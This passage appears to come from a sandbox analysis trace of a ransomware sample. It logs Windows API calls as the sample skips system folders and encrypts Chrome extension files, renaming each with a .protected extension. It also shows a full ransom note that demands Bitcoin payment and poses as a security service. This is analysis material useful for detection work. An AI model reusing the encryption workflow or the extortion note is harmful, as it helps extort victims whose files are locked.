HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\messages.json") returned 158 [0080.411] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.411] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\messages.json") returned 158 [0080.411] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.411] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb2, lpOverlapped=0x0) returned 1 [0080.412] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.412] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb2, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb2, lpOverlapped=0x0) returned 1 [0080.412] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.413] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.414] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.414] CloseHandle (hObject=0x168) returned 1 [0080.414] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\messages.json.protected") returned 168 [0080.415] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_gb\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_gb\\messages.json.protected")) returned 1 [0080.415] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.416] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.416] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\RESTORE_FILES.txt") returned 162 [0080.416] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_gb\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.416] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.417] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.418] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.418] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.418] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.418] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.418] CloseHandle (hObject=0x164) returned 1 [0080.418] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.418] lstrcmpiW (lpString1="en_US", lpString2="Windows") returned -1 [0080.418] lstrcmpiW (lpString1="en_US", lpString2="Program Files") returned -1 [0080.418] lstrcmpiW (lpString1="en_US", lpString2="Program Files (x86)") returned -1 [0080.418] lstrcmpiW (lpString1="en_US", lpString2="$Recycle.bin") returned 1 [0080.418] lstrcmpiW (lpString1="en_US", lpString2="System Volume Information") returned -1 [0080.418] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US") returned 144 [0080.418] lstrcmpW (lpString1="en_US", lpString2=".") returned 1 [0080.419] lstrcmpW (lpString1="en_US", lpString2="..") returned 1 [0080.419] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\*") returned 146 [0080.419] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.420] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.420] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.420] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.420] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.420] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.420] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\.") returned 146 [0080.420] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.420] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.420] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.420] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.420] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.420] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.420] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.420] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\..") returned 147 [0080.420] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.420] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.421] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.421] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.421] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.421] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.421] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.421] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.421] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\messages.json") returned 158 [0080.421] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.421] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.421] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.421] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.421] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_us\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.422] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\messages.json") returned 158 [0080.422] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.422] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\messages.json") returned 158 [0080.422] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.422] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\messages.json") returned 158 [0080.422] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.422] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x109, lpOverlapped=0x0) returned 1 [0080.423] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffef7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.423] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x109, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x109, lpOverlapped=0x0) returned 1 [0080.423] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.423] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.423] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.424] CloseHandle (hObject=0x168) returned 1 [0080.424] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\messages.json.protected") returned 168 [0080.424] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_us\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_us\\messages.json.protected")) returned 1 [0080.425] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.425] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.425] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\RESTORE_FILES.txt") returned 162 [0080.425] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_us\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.426] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.426] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.427] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.427] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.427] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.427] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.427] CloseHandle (hObject=0x164) returned 1 [0080.427] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.427] lstrcmpiW (lpString1="es", lpString2="Windows") returned -1 [0080.427] lstrcmpiW (lpString1="es", lpString2="Program Files") returned -1 [0080.427] lstrcmpiW (lpString1="es", lpString2="Program Files (x86)") returned -1 [0080.427] lstrcmpiW (lpString1="es", lpString2="$Recycle.bin") returned 1 [0080.427] lstrcmpiW (lpString1="es", lpString2="System Volume Information") returned -1 [0080.427] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es") returned 141 [0080.427] lstrcmpW (lpString1="es", lpString2=".") returned 1 [0080.427] lstrcmpW (lpString1="es", lpString2="..") returned 1 [0080.427] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\*") returned 143 [0080.427] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.428] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.428] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.428] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.428] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.428] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.428] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\.") returned 143 [0080.428] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.428] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.428] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.428] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.428] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.428] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.428] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.428] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\..") returned 144 [0080.428] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.428] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.428] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.428] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.428] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.428] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.428] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.428] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.429] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json") returned 155 [0080.429] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.429] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.429] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.429] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.429] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.429] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json") returned 155 [0080.429] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.429] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json") returned 155 [0080.429] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.429] lstrlenW 